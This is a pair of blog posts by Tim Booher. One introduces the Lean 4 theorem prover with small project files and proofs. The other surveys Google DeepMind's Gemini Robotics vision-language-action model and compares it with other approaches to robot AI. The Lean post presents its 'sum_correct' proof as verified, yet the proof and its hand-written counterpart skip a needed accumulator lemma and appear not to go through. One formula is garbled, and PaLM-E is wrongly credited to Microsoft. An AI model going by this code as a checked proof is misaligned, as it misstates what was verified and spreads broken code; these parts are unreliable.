Posts by:

Tim Booher

Let’s get Lean

(warning: I’m not trying here to explain something to folks outside computer science, but more summarize something awesome I’m learning that is changing how I write code)

As software systems grow increasingly complex and automated, ensuring correctness becomes a monumental challenge. In a future of automatically generated code, certainty is both elusive and critical. Enter Lean, a modern interactive theorem prover designed to help you reason rigorously about your code, verify its correctness, and even prove mathematical theorems. A long term research thread of mine is to make these tools increasingly useful with the goal of building stuff faster while dramatically increasing security.

Lean is a functional programming language and interactive theorem prover created by Leonardo de Moura at Microsoft Research in 2013, now an open-source project hosted on GitHub. It facilitates writing correct and maintainable code by focusing on types and functions, enabling users to concentrate on problem-solving rather than implementation details. Lean boasts features such as type inference, first-class functions, dependent types, pattern matching, extensible syntax, hygienic macros, type classes, metaprogramming, and multithreading. It also allows verification by proving properties about functions within the language itself. Lean 4 is the latest version, supported by the active Lean community and the extensive mathematical library Mathlib. Additionally, the Lean FRO nonprofit was founded in 2023 to enhance Lean’s scalability, usability, and proof automation capabilities.

Lean is a formal proof assistant—a tool that allows you to write mathematical proofs or verify software formally. It merges powerful logical foundations with ease of use, making formal verification more approachable than ever before. It’s fully integrated with visual studio.

This matters because formal verification with Lean significantly improves software reliability, reducing bugs and enhancing safety in critical sectors such as aerospace, finance, and healthcare. Lean’s rigorous approach provides exceptional precision, enabling detection of subtle errors that traditional testing often overlooks. Additionally, Lean offers profound mathematical insights, empowering mathematicians to formally confirm intricate proofs common in advanced mathematics. If fully understanding the logic of advanced math isn’t the most powerful application of AI, I don’t know what is.

Real Example

What does the most simple lean program look like?

.
├── Hello
│   └── Basic.lean
├── Hello.lean
├── Main.lean
├── README.md
├── lake-manifest.json
├── lakefile.toml
└── lean-toolchain

In Hello/Basic.lean, we define a basic greeting:

def hello := "world"

The Hello.lean file serves as the root module, importing Hello.Basic:

import Hello.Basic

The Main.lean file combines these elements and includes a formal proof:

import Hello

def main : IO Unit :=
  IO.println s!"Hello, {hello}!"

theorem hello_world : 2 + 2 = 4 := by
  simp

Here, the main function prints a greeting, while the hello_world theorem demonstrates Lean’s capability to formally verify that 2 + 2 equals 4 using the simp tactic.

In Lean 4, the simp tactic is a powerful tool used to simplify goals and hypotheses by applying a collection of simplification lemmas, known as simp lemmas. These lemmas are tagged with the @[simp] attribute and are designed to rewrite expressions into simpler or more canonical forms. When invoked, simp traverses the goal or hypothesis, applying applicable simp lemmas to transform the expression step by step. For example, in proving the theorem 2 + 2 = 4, the simp tactic automatically simplifies the left-hand side to match the right-hand side, effectively completing the proof without manual intervention. This automation makes simp an essential tactic for streamlining proofs and reducing boilerplate in formal verification.

By running lake build, Lean compiles the project and verifies the theorem. If the theorem is incorrect or the proof is invalid, Lean will provide an error, ensuring that only mathematically sound code is accepted.

This approach to software development, where code correctness is mathematically guaranteed, is especially valuable in critical systems where reliability is non-negotiable. Lean 4 empowers developers to write code that is not only functional but also formally verified, bridging the gap between programming and mathematical proof.

At this point, you are probably wondering, what Lean can really do. Every human knows 2 + 2 = 4. So let’s do something real with a real proof by induction.

-- a more interesting proof: ∀ a b, a + b = b + a
theorem add_comm (a b : Nat) : a + b = b + a := by
  induction a with
  | zero =>
    -- 0 + b = b + 0 reduces to b = b
    simp
  | succ a ih =>
    -- (a+1) + b = (b + a) + 1 by IH, then simp finishes
    simp [ih]

In this example, Lean isn’t merely checking a single arithmetic equation; it’s proving that addition on the natural numbers is commutative in full generality. By invoking the induction tactic on $a$, Lean first establishes the base case where $a = 0$—showing $ + b = b + 0$ reduces to the trivial identity $b = b$—and then handles the inductive step, assuming $a + b = b + a$ to prove $(a + 1) + b = b + (a + 1)$. In each case, the simp tactic automatically applies the appropriate lemmas about Nat addition to simplify both sides of the equation to the same form. Finally, when you run lake build, Lean silently compiles your code and verifies both the simple fact $2 + 2 = 4$ and the full commutativity theorem; if any part of the proof were flawed, the build would fail, ensuring that only completely correct mathematics makes it into your code.

You can continue this to prove other properties of math.

import Hello

def main : IO Unit := do
  IO.println s!"Hello, {hello}!"
  IO.println "All proofs have been verified by Lean!"

-- trivial fact: definitionally true
theorem hello_world : 2 + 2 = 4 := by
  rfl

-- use core lemmas directly
theorem add_comm (a b : Nat) : a + b = b + a := by
  exact Nat.add_comm a b

theorem mul_add (a b c : Nat) : a * (b + c) = a * b + a * c := by
  exact Nat.mul_add a b c

For the more substantial theorems, we use the exact tactic to invoke core library lemmas directly: Nat.add_comm proves commutativity of addition $(a + b = b + a)$, and Nat.mul_add proves distributivity of multiplication over addition $(a * (b + c) = a * b + a * c)$. By relying on these already‑proven lemmas, Lean’s compiler verifies each theorem at build time—any failure in these proofs will cause lake build to error out.

Ok, so proving the basic properties of math is super cool, but how exactly is this useful? Below is an example of a “real‑world” optimization—rewriting a naive, non‑tail‑recursive summation over a list into a tail‑recursive loop—and formally verifying that the optimized version is equivalent to the original. This kind of proof is exactly what you’d need to trust that your performance tweaks haven’t changed the meaning of your code.

In embedded systems, optimization matters. The code below demonstrates how Lean can formally verify that a tail-recursive optimization is functionally equivalent to its naive counterpart—a task that’s often error-prone when done manually in traditional languages like C. The function sum is a simple, natural recursive definition that adds up all the elements of a list. It’s clear and expressive but not stack-safe for large inputs due to its non-tail-recursive form. To improve performance, we define sumAcc, which uses an explicit accumulator and a tail-recursive helper function to avoid deep call stacks. The theorem sum_correct proves that for any list of natural numbers, sum xs = sumAcc xs. This is mathematically interesting because it confirms—using structural induction and algebraic reasoning—that the transformation preserves meaning across all inputs, not just for a few test cases. In systems programming terms, this is like formally proving that a loop unrolling or inlining optimization didn’t introduce a subtle bug—a capability that’s increasingly essential as code becomes more complex and performance-critical.

import Hello
import Std.Data.List.Basic

open Std

def main : IO Unit := do
  IO.println s!"Hello, {hello}!"
  IO.println "All proofs have been verified by Lean!"

-- naive, non‑tail‑recursive sum
def sum : List Nat → Nat
| []      => 0
| x :: xs => x + sum xs

-- optimized, tail‑recursive sum using an accumulator
def sumAcc (xs : List Nat) : Nat :=
  let rec go (ys : List Nat) (acc : Nat) : Nat :=
    match ys with
    | []      => acc
    | y :: ys => go ys (acc + y)
  go xs 0

-- proof that the optimized version agrees with the naive one
theorem sum_correct (xs : List Nat) : sum xs = sumAcc xs := by
  induction xs with
  | nil =>
    -- sum [] = 0, sumAcc [] = go [] 0 = 0
    rfl
  | cons x xs ih =>
    -- sum (x :: xs) = x + sum xs
    -- sumAcc (x :: xs) = go (x :: xs) 0 = go xs (0 + x)
    -- we simplify and then apply the inductive hypothesis
    simp [sum, sumAcc]
    -- now we have: x + sum xs = sumAcc xs + x
    -- but sumAcc xs = sum xs by ih, and addition is commutative
    rw [ih]

If we were to sit down and do the math of this, it’s not straightforward:

We define two functions to compute the sum of a list of natural numbers. The first is a simple recursive version:

$$ \text{sum}([]) = 0 $$ $$ \text{sum}(x :: xs) = x + \text{sum}(xs) $$

The second is an optimized version using a tail-recursive helper function with an accumulator:

$$ \text{go}([], acc) = acc $$ $$ \text{go}(y :: ys, acc) = \text{go}(ys, acc + y) $$ $$ \text{sumAcc}(xs) = \text{go}(xs, 0) $$

We want to prove that both definitions produce the same result for any list of natural numbers:

$$ \forall xs : \text{List}(\mathbb{N}),\ \text{sum}(xs) = \text{sumAcc}(xs) $$

This is proven by structural induction on the list xs.

Base case:

$$ \text{sum}([]) = 0 $$ $$ \text{sumAcc}([]) = \text{go}([], 0) = 0 $$

Inductive step: Assume the inductive hypothesis:

$$ \text{sum}(xs) = \text{sumAcc}(xs) $$

We want to prove it holds for x :: xs:

$$ \text{sum}(x :: xs) = x + \text{sum}(xs) $$ $$ \text{sumAcc}(x :: xs) = \text{go}(x :: xs, 0) = \text{go}(xs, x) $$

By the inductive hypothesis:

$$ \text{sum}(xs) = \text{sumAcc}(xs) $$

So we substitute:

$$ x + \text{sum}(xs) = x + \text{sumAcc}(xs) $$

And from the definition of go, we know:

$$ \text{go}(xs, x) = x + \text{sumAcc}(xs) $$

Thus:

$$ \text{sum}(x :: xs) = \text{sumAcc}(x :: xs) $$

Therefore, by induction, the optimized version sumAcc is provably equivalent to the original sum for all input lists:

$$ \forall xs,\ \text{sum}(xs) = \text{sumAcc}(xs) $$

This proof ensures that the tail-recursive version retains the exact semantics of the original function—guaranteeing correctness even after performance optimization. It’s a clear example of how Lean can verify low-level loop transformations that might otherwise introduce subtle bugs in traditional systems code.

So all this hurts my head. I’m glad that software is going to do this kinda thing, and a bit in awe of the brilliance of folks who build these tools.

As software complexity grows, formal verification tools like Lean are not merely nice to have—they become essential. Companies and research institutions increasingly adopt Lean to ensure high-quality, reliable code, making Lean skills highly valuable.

Conclusion

Lean isn’t just another programming tool; it’s a powerful ally in your pursuit of correctness and reliability in mathematics and software development. Whether you’re proving intricate mathematical theorems or ensuring your software meets precise specifications, Lean is a valuable skill that promises to shape the future of reliable software and mathematics. And yes, this all complicated, but it’s super powerful, and these are exactly the powers needed as we go into a world with vibe coding, power tools and fully automated build environments. Watch this space.

April 13, 2025 (updated April 14, 2025) By Tim Booher One Comment

Autonomy

Robot Vision (and action)!

Hello Gemini Robotics! Google surprised me a couple weeks ago with some cool tech. I’m watching carefully for the events that get AI into hardware and Vision Language Action has a lot of promise in creating more general and adaptable robots. It’s a good name — intelligence that integrates vision, language, and action—allowing robots to understand natural language commands and execute complex tasks in dynamic environments. This represents a move away from narrowly focused, task-specific systems toward robots that can generalize skills across different scenarios.

Google’s PaLM-E debuted in 2023 as one of the first attempts to extend large language models into the robotics domain, using a multimodal setup (text and vision) to instruct simple robot behaviors. While groundbreaking for its time, PaLM-E’s capabilities were limited in terms of task complexity and real-world robustness. Fast-forward to 2025, and Gemini Robotics takes these ideas much further by harnessing the significantly more powerful Gemini 2.0 foundation model. In doing so, Gemini’s Vision-Language-Action (VLA) architecture not only understands language and visual inputs, but also translates them into real-time physical actions. According to DeepMind’s official blog post—“Gemini Robotics brings AI into the physical world”—this new system enables robots of virtually any shape or size to perform a wide range of tasks in dynamic environments, effectively bridging the gap between large-scale multimodal reasoning and real-world embodied intelligence in a way that PaLM-E never could.

However, while its potential is transformative, there are still challenges to overcome in trust and safety, dealing with hardware constraints, and fine-tuning physical actions that might not perfectly align with human intuition.

Introduction

Google DeepMind’s Gemini Robotics is pretty cool. It’s an AI model designed to bring advanced intelligence into the physical world of robots. Announced on March 12, 2025, it represents the company’s most advanced vision-language-action (VLA) system, meaning it can see and interpret visual inputs, understand and generate language, and directly output physical actions. Built on DeepMind’s powerful Gemini 2.0 large language model, the Gemini Robotics system is tailored for robotics applications, enabling machines to comprehend new situations and perform complex tasks in response to natural language commands. This model is a major step toward “truly general purpose robots,” integrating multiple AI capabilities so robots can adapt, interact, and manipulate their environment more like humans do.

Origins and Development of Gemini Robotics

The development of Gemini Robotics is rooted in Google and DeepMind’s combined advances in AI and robotics over the past few years. Google had long viewed robotics as a “helpful testing ground” for AI breakthroughs in the physical realm. Early efforts laid the groundwork: for example, Google researchers pioneered systems like PaLM-SayCan, which combined language models with robotic planning, and PaLM-E, a multimodal embodied language model, hinted at the potential of integrating language understanding with robotic control. In mid-2023, Google DeepMind introduced Robotics Transformer 2 (RT-2), a VLA model that learned from both web data and real robot demonstrations and could translate knowledge into generalized robotic instructions. RT-2 showed improved generalization and rudimentary reasoning – it could interpret new commands and leverage high-level concepts (e.g. identifying an object that could serve as an improvised tool) beyond its direct training. However, RT-2 was limited in that it could only repurpose physical movements it had already practiced; it struggled with fine-grained manipulations it hadn’t explicitly learned.

Gemini Robotics builds directly on these foundations, combining Google’s latest large language model advances with DeepMind’s robotics research. It is built on the Gemini 2.0 foundation model, which is a multimodal AI capable of processing text, images, and more. By adding physical actions as a new output modality to this AI, the team created an agent that can not only perceive and talk, but also act in the real world. The project has been led by Google DeepMind’s robotics division (headed by Carolina Parada) and involved integrating multiple research breakthroughs. According to DeepMind, Gemini Robotics and a companion model called Gemini Robotics-ER were concurrently developed and launched as “the foundation for a new generation of helpful robots”. The models were primarily trained using data from DeepMind’s bi-arm robot platform ALOHA 2 (a dual-armed robotic system introduced in 2024). Early testing was focused on this platform, but the system was also adapted to other hardware – demonstrating control of standard robot arms (Franka Emika robots common in labs) and even a humanoid form (the Apollo robot from Apptronik). This cross-pollination of Google’s large-scale AI (Gemini 2.0) with DeepMind’s embodied AI research culminated in Gemini Robotics, which was formally unveiled in March 2025. Its development reflects a convergence of trends: ever-larger and more general AI models, and the push to make robots more adaptive and intelligent in uncontrolled environments.

Google DeepMind’s announcement comes amid a “race to make robots useful” in the real world, with several companies striving for similar breakthroughs. Notably, just a month prior, robotics startup Figure AI ended a collaboration with OpenAI after claiming an internal AI breakthrough for robots – underscoring that multiple players are working toward general robotic intelligence (awesome). Within this context, Gemini Robotics emerged as one of the most ambitious efforts, leveraging Google’s unique assets (massive language models, vast web data, and prior robotics investments) to create a generalist “brain” for robots.

The Vision-Language-Action (VLA) Model Explained

At the heart of Gemini Robotics is its vision-language-action (VLA) architecture, which seamlessly integrates perception, linguistic reasoning, and motor control. In practical terms, the model can take visual inputs (such as images or camera feeds of a scene), along with natural language inputs (spoken or written instructions), and produce action outputs that drive a robot’s motors or high-level control system. This tri-modal integration allows a robot equipped with Gemini to perceive its surroundings, understand what needs to be done, and then execute the required steps – all in one fluid loop.

Under the hood, Gemini Robotics leverages the powerful representation and reasoning capabilities of the Gemini 2.0 LLM to interpret both the visual scene and the instruction. The visual input is processed by advanced vision models (DeepMind has indicated that PaLI-X and related vision transformers were adapted as part of earlier systems like RT-2, enabling the AI to recognize objects and understand spatial relationships in the camera view. This is paired with Gemini’s language understanding, which can comprehend instructions phrased in everyday, conversational language – even in different wording or multiple languages. By fusing these inputs, the model forms an internal plan or representation of what action to take. The crucial innovation is that the output is not text, but action commands: Gemini Robotics generates a sequence of motor control tokens or low-level instructions that directly control the robot’s joints and grippers. These action outputs are encoded similarly to language tokens – for example, a series of numeric tokens might represent moving a robotic arm to certain coordinates or applying a specific force. This design treats actions as another “language” for the AI to speak.

An intuitive example of how the VLA model works is the task: “Pick up the banana and put it in the basket.” Given this spoken command, a Gemini-powered robot will use its camera to scan the scene, recognize the banana and the basket (drawing on its visual training), understand the instruction and the desired outcome, and then generate the motor actions to reach out, grasp the banana, and drop it into the basket. All of this can occur without hard-coding specific moves for “banana” or “basket” – the model’s general vision-language knowledge enables it to figure it out. Another striking example demonstrated by Google DeepMind was: “Fold an origami fox.” Without having been explicitly trained on that exact task, the system was able to combine its knowledge of origami (learned from text or images during pre-training) with its ability to control robot hands, successfully folding a paper into the shape of a fox. This showcased how Gemini’s world knowledge can translate into physical skill, even for tasks the robot has never performed before. The VLA architecture effectively allows the robot to generalize concepts to new actions – it “understands” what folding a fox entails and can execute the fine motor steps to do so, all guided by a single natural-language instruction.

Technical Functionality and Capabilities

Gemini Robotics is engineered around three key capabilities needed for versatile robots: generality, interactivity, and dexterity. In each of these dimensions, it represents a leap over previous systems, inching closer to the vision of a general-purpose helper robot.

Generality and World Knowledge: Because it is built atop the Gemini 2.0 model (which was trained on vast internet data and encodes extensive commonsense and factual knowledge), Gemini Robotics can handle a wide variety of tasks and adapt to new situations on the fly. It leverages “Gemini’s world understanding to generalize to novel situations,” allowing it to tackle tasks it never saw during training. For example, researchers report that the model-controlled robot could perform a “slam dunk” with a toy basketball into a mini hoop when asked – despite never having seen anything related to basketball in its robot training data. The robot’s foundation model knew what a basketball and hoop are and what “slam dunk” means conceptually, and it could connect those concepts to actual motions (picking up the ball and dropping it through the hoop) to satisfy the command. This kind of cross-domain generalization – applying knowledge from one context to a new, embodied scenario – is a hallmark of Gemini Robotics. In quantitative terms, Google DeepMind noted that Gemini Robotics more than doubled performance on a comprehensive generalization benchmark compared to prior state-of-the-art VLA models. In other words, when tested on tasks, objects, or instructions outside its training distribution, it succeeded more than twice as often as earlier models. This suggests a significant improvement in robustness to novel situations.
Interactivity and Adaptability: Gemini Robotics is designed to work collaboratively with humans and respond dynamically to changes in the environment. Thanks to its language proficiency, the robot can understand nuanced instructions and even follow along in a back-and-forth dialogue if needed. The model can take instructions given in different ways. Crucially, it also demonstrates real-time adaptability: it “continuously monitors its surroundings” and can adjust its plan if something changes mid-task. An example shown by researchers involved a robot told to place a bunch of grapes into a specific container. Midway through, a person shuffled the containers around on the table. Gemini’s controller tracked the target container as it moved and still completed the task, successfully following the correct container in a game of three-card monte on the fly. This shows a level of situational awareness and reactivity that previous static plans would fail at. If an object slips from the robot’s grasp or is moved by someone, the model can quickly replan its actions and continue appropriately. In practical terms, this makes the robot much more resilient in unstructured, dynamic settings like homes or workplaces, where surprises happen regularly. Users can also update instructions on the fly – for instance, interrupt a task with a new command – and Gemini will smoothly transition, a quality of “steerability” that is important for human-robot collaboration.
Dexterity and Physical Skills: A standout feature of Gemini Robotics is its level of fine motor control. Many everyday tasks humans do – buttoning a shirt, folding paper, handling fragile objects – are notoriously hard for robots because they require precise force and coordination. Gemini Robotics has demonstrated advanced dexterity by tackling multi-step manipulation tasks that were previously considered out of reach for robots without extensive task-specific programming. In tests, its dual-armed system could fold an origami crane, pack a lunchbox with assorted items, carefully pick a single card from a deck without bending others, and even seal snacks in a Ziploc bag. These examples illustrate delicate handling and coordination of two arms/hands – akin to human bimanual tasks. Observers noted that this capability appears to “solve one of robotics’ biggest challenges: getting robots to turn their ‘knowledge’ into careful, precise movements in the real world”. It’s important to note, however, that some of the most intricate feats were achieved in the context of tasks the model was trained on with high-quality data, meaning the robot had practice or human-provided demonstrations for those specific skills. As IEEE Spectrum reported, the impressive origami performance doesn’t yet mean the robot will generalize all dexterous skills – rather, it shows the upper bound of what the system can do when given focused training on a fine motor task. Still, compared to prior systems that could barely grasp a single object reliably, Gemini’s leap to complex manipulation is a significant advancement.

Multi-Embodiment and Adaptability to Hardware: Another technical strength of Gemini Robotics is its ability to work across different robot form factors. Rather than being tied to one specific robot model or configuration, the Gemini AI was trained in a way that makes it adaptable to “multiple embodiments”. DeepMind demonstrated that a single Gemini Robotics model could control both a fixed bi-arm platform and a humanoid robot with very different kinematics. The team trained primarily on their ALOHA 2 twin-arm system, but also showed the model could be specialized to operate the Apptronik “Apollo” humanoid – which has arms, hands, and a torso – to perform similar tasks in a human-like form. This hints at a future where one core AI could power many kinds of robots, from warehouse picker arms to home assistant humanoids, with minimal additional training for each. Google has in fact partnered with Apptronik and other robotics companies as trusted testers to apply Gemini in different settings. The generalist nature of the model means it encodes abstract skills that can transfer to new bodies. Of course, some calibration is needed for each hardware – the system might need to learn the dynamics and constraints of a new robot – but it doesn’t need to learn the task from scratch. This is a big efficiency gain: historically, each new robot or use-case required building an AI model almost from zero or collecting a trove of demonstrations, whereas Gemini provides a strong starting point.
Embodied Reasoning (Gemini Robotics-ER): Alongside the main Gemini Robotics model, Google DeepMind introduced Gemini Robotics-ER (with “ER” standing for Embodied Reasoning). This variant emphasizes enhanced spatial understanding and reasoning about the physical world, and it is intended as a tool for roboticists to integrate with their own control systems. Gemini Robotics-ER can be thought of as a vision-language model with an intuitive grasp of physics and geometry – it can look at a scene and infer things like object locations, relationships, or potential affordances. For instance, if shown a coffee mug, the model can identify an appropriate grasping point (the handle) and even plan a safe approach trajectory for picking it up. It marries the perception and language skills of Gemini with a sort of built-in physics engine and even coding abilities: the model can output not only actions but also generated code or pseudo-code to control a robot, which developers can hook into low-level controllers. In tests, Gemini-ER could perform an end-to-end robotics pipeline (perception → state estimation → spatial reasoning → planning → control commands) out-of-the-box, achieving 2-3× higher success rates on certain tasks compared to using Gemini 2.0 alone. A striking feature is its use of in-context learning for physical tasks – if the initial attempt isn’t sufficient, the model can take a few human-provided demonstrations as examples and then improve or adapt its solution accordingly. Essentially, Robotics-ER acts as an intelligent perception and planning module that can be plugged into existing robots, complementing the primary Gemini Robotics policy which directly outputs actions. By separating out this embodied reasoning component, DeepMind allows developers to leverage Gemini’s spatial intelligence even if they prefer to use their own motion controllers or safety constraints at the execution layer. This two-model approach (Gemini Robotics and Robotics-ER) gives flexibility in deployment – one can use the full end-to-end model for maximum autonomy, or use the ER model alongside manual programming to guide a robot with high-level smarts.
Safety Mechanisms: Given the high level of autonomy Gemini Robotics enables, safety has been a paramount concern in its functionality. The team implemented a layered approach to safety, combining traditional low-level safety (e.g. collision avoidance, not exerting excessive force) with higher-level “semantic safety” checks. The model evaluates the content of instructions and the consequences of actions before executing them, especially in the Robotics-ER version which was explicitly trained to judge whether an action is safe in a given scenario. For example, if asked to mix chemicals or put an object where it doesn’t belong, the AI should recognize potential hazards. DeepMind’s head of robotic safety, Vikas Sindhwani, explained that the Gemini models are trained to understand common-sense rules about the physical world – for instance, knowing that placing a plush toy on a hot stove or combining certain household chemicals would be unsafe. To benchmark this, the team introduced a new “Asimov” safety dataset and benchmark (named after Isaac Asimov, who famously penned robot ethics rules) to test AI models on their grasp of such common-sense constraints. The Gemini models reportedly performed well, answering over 80% of the safety questions correctly. This indicates the model usually recognizes overtly dangerous instructions or outcomes. Additionally, Google DeepMind has implemented a set of governance rules (“robot constitution”) for the robot’s behavior, inspired by Asimov’s Three Laws of Robotics, which were expanded into the ASIMOV dataset to train and evaluate the robot’s adherence to ethical guidelines. For instance, rules might include not harming humans, not damaging property, and prioritizing user intent while obeying safety constraints. These guardrails, combined with ongoing human oversight (especially during testing phases), aim to ensure the powerful capabilities of Gemini Robotics are used responsibly and do not lead to unintended harm.

Is Gemini Robotics the Future of Robotics?

So are we done? Time for our robot overlords? The introduction of Gemini Robotics has sparked debate about whether large VLA models like this represent the future of robotics – a future where robots are generalists rather than specialists, and where intelligence is largely driven by massive pretrained AI models. Google DeepMind certainly positions Gemini as a game-changer, stating that it “lays the foundation for a new generation of helpful robots” and touting its success on previously impossible tasks. Many experts see this as a natural evolution: as AI systems have achieved human-level (and beyond) performance in language and vision tasks, it was inevitable that those capabilities would be extended to physical machines. Generative AI models are getting closer to taking action in the real world, notes IEEE Spectrum, and the big AI companies are now introducing AI agents that move from just chatting or analyzing images to actually manipulating objects and environments. In this sense, Gemini Robotics does appear to be a glimpse of robotics’ likely trajectory – one where embodied AI is informed by vast prior knowledge and can be instructed as easily as talking to a smart speaker. The ability to simply tell a robot what to do in natural language (e.g. “please tidy up the kitchen” or “assemble this Ikea chair”) and have it figure out the steps is a long-standing dream in robotics, and Gemini’s demos suggest we are closer than ever.

Proponents argue that such generalist models are necessary to break robotics out of its current limits. Up to now, most robots excel only in narrow domains (an industrial arm can repeat one assembly task all day, a Roomba can vacuum floors but do nothing else, etc.). To be broadly useful in human environments, robots must deal with endless variability – new objects, unforeseen situations, and evolving human instructions. Hard-coding every contingency or training a custom model for every task is impractical. Therefore, an AI that can leverage world knowledge and reason on the fly is needed. Google’s team emphasizes that all three qualities – generalization, adaptability, dexterity – are “necessary… to create a new generation of helpful robots” that can actually operate in our homes and workplaces. In other words, without an AI like Gemini, robots would remain too rigid or labor-intensive to program for the messy real world. By giving robots a “common sense” understanding of the world and the ability to learn tasks from description, Gemini Robotics indeed could be a cornerstone for future robotics platforms.

That said, whether Gemini’s approach is the future or just one branch is still a matter of discussion. Some robotics researchers caution against over-relying on massive pretrained models. One limitation observed even in Gemini is that its human-like biases may not always yield optimal physical decisions. For example, Gemini-ER identified the handle of a coffee mug as the best grasp point – because in human data, people hold mugs by handles – but for a robot hand, especially one immune to heat, grabbing the sturdy body of the mug might actually be more stable than the thin handle. This shows that the AI’s “common sense” is derived from human norms, which isn’t always ideal for a machine’s capabilities. Overcoming such discrepancies may require integrating pure learning from trial and error or additional physical reasoning beyond internet-based knowledge. Additionally, the most dexterous feats Gemini achieved were ones it specifically trained for with high-quality demonstrations. This indicates that while the model is general, it still benefits from practice on complex tasks – true one-shot generalization to any arbitrary manipulation is not fully solved. In essence, Gemini Robotics might be necessary but not sufficient for the future of robotics: it provides the intelligence and adaptability, but it must be paired with continued advances in robot hardware and in task-specific learning.

Another consideration is the computational complexity. Gemini 2.0 (the base model) is extremely large, and running such models in real-time on a robot can be challenging. Currently, much processing might happen on cloud servers or off-board computers. The future of robotics may depend on making these models more efficient (something Google is also addressing with smaller variants like “Gemma” models for on-device AI. The necessity of a model like Gemini might also depend on the application: for a general home assistant or a multipurpose factory robot, a broad intelligence is likely crucial. But for simpler, well-defined tasks (say, a robot that just sorts packages), a smaller specialized AI might suffice more economically. Therefore, we might see a hybrid future – in high-complexity domains, Gemini-like brains lead the way, whereas simpler robots use more lightweight solutions. Nonetheless, the techniques and learnings from Gemini (like treating actions as language tokens, and using language models for planning) are influencing the entire field. Competing approaches will likely incorporate similar ideas of multi-modal learning and large-scale pre-training because of the clear gains in capability that Gemini and its predecessors have demonstrated. In summary, Gemini Robotics does appear to be a harbinger of robotics’ future, providing a path to move beyond single-purpose machines. Its advent underscores a paradigm shift where generalist AI systems control robots – a notion that until recently belonged to science fiction – and it illustrates both the promise and the remaining challenges on the road to truly adaptive, helpful robots.

Comparisons to Alternative Approaches in Robotic AI

Gemini Robotics’s approach can be contrasted with several other strategies in robotic AI, each with its own philosophy and trade-offs. Below, we compare it to some notable alternatives:

Modular Robotics (Traditional Pipeline): The classic approach to robot intelligence breaks the problem into separate modules: perception (computer vision to detect objects, SLAM for mapping), decision-making (often rule-based or using a planner), and low-level control (path planning and motor control). In such systems, there isn’t a single monolithic AI “brain” – instead, engineers program each component and often use specific AI models for each (like a convolutional network for object recognition, a motion planner for navigation, etc.). The advantage is reliability and predictability; each module can be tuned and verified. However, the drawback is rigidity – the robot can only do what its modules were explicitly designed for. Adding new tasks requires significant re-engineering. In contrast, Gemini Robotics is more of an end-to-end learned system. It attempts to handle perception, reasoning, and action generation in one model (or at least with tightly integrated learned components). This holistic approach allows for more flexibility – e.g. interpreting an unfamiliar instruction and devising a behavior – which a modular system might not handle if not pre-programmed. Of course, Gemini still relies on some low-level controllers (for fine motion, safety constraints), but the boundary between modules is blurred compared to the traditional pipeline. Essentially, Gemini trades some transparency for vastly greater adaptability. As robots move into unstructured environments, this trade is often seen as worthwhile, because no team of engineers can anticipate every scenario the way a large trained model can generalize.
Reinforcement Learning and Imitation Learning: Another approach is to teach robots via trial and error (RL) or by imitating human demonstrations, training a policy neural network for specific tasks. OpenAI famously used reinforcement learning plus human teleoperation demos to train a robot hand to solve a Rubik’s Cube, and Boston Dynamics uses a mix of planning and learned policies for locomotion. These systems can achieve remarkable feats, but they are typically narrow in scope – the policy is an expert at one task or a set of related tasks. Gato, a 2022 DeepMind model, was an attempt at a multi-task agent (it learned from dozens of different tasks, from playing Atari games to controlling a robot arm), but even Gato had a fixed set of skills defined by its training data. Gemini Robotics differs by leveraging pretrained knowledge: rather than learning from scratch via millions of trials, it starts with a rich base of semantic and visual understanding from web data. This gives it a form of “common sense” and language ability out-of-the-box that pure RL policies lack. In essence, Gemini moves the needle from “learning by doing” to “learning by reading/seeing” (plus some doing). That means a Gemini-based robot might execute a new task correctly on the first try because it can reason it out, whereas an RL-based robot would likely flail until it accumulates enough reward feedback. The flip side is that RL can sometimes discover unconventional but effective strategies (since it isn’t constrained by human priors), and it can optimize for physical realities (dynamics, wear and tear) if given direct experience. A future approach might combine both: use models like Gemini for high-level reasoning and understanding, but allow some reinforcement fine-tuning on the robot itself to refine the motions for efficiency or reliability. In fact, fine-tuning Gemini on robotic data (like how RT-2 was fine-tuned on real robot experiences is exactly what Google did, and further RL training could be a next step beyond the initial demo capabilities.
Other Foundation Model Approaches: Google is not alone in applying foundation models to robotics. Competitors and research labs are pursuing similar visions. For example, OpenAI has been exploring ways to connect its GPT-4 model to robotics (though no official product has been announced, internal experiments and partnerships have been noted). The startup Figure AI, which is building humanoid robots, initially partnered with OpenAI to leverage GPT-style intelligence, but as Reuters reported, Figure decided to develop its own model after making an internal breakthrough. This suggests that a number of players are working on language-model-driven robotics, each with their own twist. Another example is Microsoft and Google’s PaLM-E (embodied language model) which was a precursor integrating a vision encoder with a language model to output robot actions. Meta (Facebook) has also done research on combining vision, language, and action – though they’ve been quieter in announcing a unified model, they have components like visual question answering and world model simulators that could feed into robotics. There is also a distinction in whether the model is end-to-end or generates code for the robot. Some approaches have the AI output code (in Python or a robot API) which is then executed by a lower system – this can be safer in some cases, as the code can be reviewed or sandboxed. Gemini-ER’s ability to produce code for robot control falls into this category. Companies like Adept AI take a similar approach for software automation (outputting code from instructions); applied to robotics, one could imagine an AI that writes a script for the robot (e.g. using a library like ROS – Robot Operating System – to move joints) rather than directly controlling every torque. The drawback is that if the situation deviates, the code might not handle it unless the AI is looped in to rewrite it. Gemini’s direct policy is more fluid, but code-generation approaches offer interpretability.

In comparison to these alternatives, Gemini Robotics distinguishes itself by its scale of general knowledge and its demonstrated range of capabilities without task-specific training. A Tech Review article headline concisely states it “uses Google’s top language model to make robots more useful,” implying that plugging in this very large pre-trained brain yields a robot that can do far more than ones programmed with only task-specific data. Moreover, Gemini was shown to operate “with minimal training” for new tasks – many instructions it can execute correctly the first time, thanks to its prior knowledge. This sets it apart from typical RL or modular systems which often need extensive data or engineering for each new behavior. However, it’s worth noting that alternative approaches are converging. For instance, Robotics Transformer (RT-2), while smaller in scope, was already a VLA model and Gemini is essentially the next evolution. So rather than completely different paradigms, we are seeing a merging: classical robotics brings the safety and control expertise, while new AI brings flexibility. The future likely involves integrating these approaches – indeed Google’s strategy with Gemini-ER is to let developers use their own controllers alongside the AI, marrying learned reasoning with trusted control algorithms.

